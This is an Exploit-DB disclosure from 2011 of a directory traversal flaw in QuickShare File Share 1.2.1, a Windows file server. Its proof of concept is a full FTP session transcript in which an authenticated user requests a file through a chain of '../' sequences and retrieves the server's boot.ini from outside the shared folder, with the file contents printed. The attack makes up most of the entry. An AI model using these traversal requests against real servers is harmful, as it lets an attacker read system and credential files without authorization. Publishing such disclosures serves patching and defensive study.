quickshare file share 1.2.1 - Directory Traversal (1)

EDB-ID:

16105

CVE:


EDB Verified:

Author:

modpr0be

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2011-02-03

Vulnerable App: 
#!/usr/bin/python

# Exploit Title: QuickShare File Share 1.2.1 Directory Traversal Vulnerability
# Date: 02/03/2011
# Author: modpr0be
# Software Link: http://www.quicksharehq.com/files/qfssetup.exe
# Vulnerable version: 1.2.1
# Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285)
# CVE : N/A

# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __  / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/  \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
#        /____/                          http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#   say hello to all digital-echidna org crew:
#     otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx:
#     otoy, cipherstring, cyb3r.anbu, oebaj.
#   help for documentation:   	
#     offsec, exploit-db, corelan-team, 5M7X, loneferret.
#

#### Software description:
# QuickShare File Server is a easy to use file sharing software helps you 
# build your own file server. Users could access your server through web 
# browsers or FTP client softwares (In most case, they need not to install 
# any extra softwares). Users could send or receive large files to or from you. 
# You could create account and set password to protect your files.
#
#### Exploit information:
# It's a directory traversal. User without prior permission can get a file
# outside the specified directory (e.g. get a file from %systemroot%).
#
# This vulnerability can be exploited by anonymous or authenticated users.
#
##

# Below is the proof of concept
# authenticated user logged in to the quickshare ftp server from Ubuntu Linux.
#

modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$

# Eof
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services